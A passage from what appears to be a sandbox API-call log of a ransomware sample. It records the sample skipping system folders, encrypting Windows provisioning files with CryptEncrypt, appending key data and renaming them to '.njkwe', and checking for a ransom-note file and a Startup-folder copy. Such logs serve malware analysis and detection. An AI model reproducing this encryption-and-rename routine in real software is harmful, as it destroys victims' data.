ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="338__C~1.PRO")) returned 1 [0078.423] lstrcmpiW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.423] lstrcmpiW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.423] lstrcmpiW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.423] lstrcmpiW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.423] lstrcmpiW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.423] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.423] StrStrIW (lpFirst="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.423] lstrcmpW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.423] lstrcmpW (lpString1="338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.423] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.423] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\338__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.423] GetTickCount () returned 0x1153ef9 [0078.424] GetTickCount () returned 0x1153ef9 [0078.424] GetTickCount () returned 0x1153ef9 [0078.424] GetTickCount () returned 0x1153ef9 [0078.424] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.424] GetProcessHeap () returned 0xbe0000 [0078.424] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.424] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1c8, lpOverlapped=0x0) returned 1 [0078.425] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.425] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1c8, lpOverlapped=0x0) returned 1 [0078.425] GetProcessHeap () returned 0xbe0000 [0078.425] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.425] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.425] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.428] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.428] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.428] CloseHandle (hObject=0x43c) returned 1 [0078.428] GetProcessHeap () returned 0xbe0000 [0078.428] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.428] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\338__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\338__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\338__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.429] GetProcessHeap () returned 0xbe0000 [0078.429] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.429] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", cAlternateFileName="339__C~1.PRO")) returned 1 [0078.429] lstrcmpiW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.429] lstrcmpiW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.429] lstrcmpiW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.429] lstrcmpiW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.429] lstrcmpiW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.429] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml") returned 165 [0078.429] StrStrIW (lpFirst="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.429] lstrcmpW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.429] lstrcmpW (lpString1="339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.429] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.429] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\339__connections_cellular_vodafone p (portugal)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.430] GetTickCount () returned 0x1153ef9 [0078.430] GetTickCount () returned 0x1153ef9 [0078.430] GetTickCount () returned 0x1153ef9 [0078.430] GetTickCount () returned 0x1153ef9 [0078.430] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.430] GetProcessHeap () returned 0xbe0000 [0078.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.430] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0078.442] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.442] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x35a, lpOverlapped=0x0) returned 1 [0078.442] GetProcessHeap () returned 0xbe0000 [0078.442] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.442] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.442] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.442] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.442] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.442] CloseHandle (hObject=0x43c) returned 1 [0078.442] GetProcessHeap () returned 0xbe0000 [0078.442] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.442] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.442] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\339__connections_cellular_vodafone p (portugal)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\339__Connections_Cellular_vodafone P (Portugal)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\339__connections_cellular_vodafone p (portugal)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.443] GetProcessHeap () returned 0xbe0000 [0078.443] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.443] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901d57cf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901d57cf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901d57cf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="33__CO~1.PRO")) returned 1 [0078.443] lstrcmpiW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.443] lstrcmpiW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.443] lstrcmpiW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.443] lstrcmpiW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.443] lstrcmpiW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.443] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml") returned 163 [0078.443] StrStrIW (lpFirst="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.443] lstrcmpW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.443] lstrcmpW (lpString1="33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.443] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.443] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\33__connections_cellular_azerfon (azerbaijan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.444] GetTickCount () returned 0x1153f09 [0078.444] GetTickCount () returned 0x1153f09 [0078.444] GetTickCount () returned 0x1153f09 [0078.444] GetTickCount () returned 0x1153f09 [0078.444] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.444] GetProcessHeap () returned 0xbe0000 [0078.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.444] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.446] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.446] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0078.446] GetProcessHeap () returned 0xbe0000 [0078.446] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.446] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.446] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.446] CloseHandle (hObject=0x43c) returned 1 [0078.447] GetProcessHeap () returned 0xbe0000 [0078.447] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.447] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\33__connections_cellular_azerfon (azerbaijan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\33__Connections_Cellular_Azerfon (Azerbaijan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\33__connections_cellular_azerfon (azerbaijan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.447] GetProcessHeap () returned 0xbe0000 [0078.447] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.447] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="340__C~1.PRO")) returned 1 [0078.447] lstrcmpiW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.447] lstrcmpiW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.447] lstrcmpiW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.447] lstrcmpiW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.448] lstrcmpiW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.448] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.448] StrStrIW (lpFirst="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.448] lstrcmpW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.448] lstrcmpW (lpString1="340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.448] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.448] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\340__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.448] GetTickCount () returned 0x1153f09 [0078.448] GetTickCount () returned 0x1153f09 [0078.448] GetTickCount () returned 0x1153f09 [0078.448] GetTickCount () returned 0x1153f09 [0078.448] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.448] GetProcessHeap () returned 0xbe0000 [0078.448] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.448] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.449] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.449] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.449] GetProcessHeap () returned 0xbe0000 [0078.449] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.449] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.450] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.450] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.451] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.451] CloseHandle (hObject=0x43c) returned 1 [0078.451] GetProcessHeap () returned 0xbe0000 [0078.451] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.451] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.451] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: 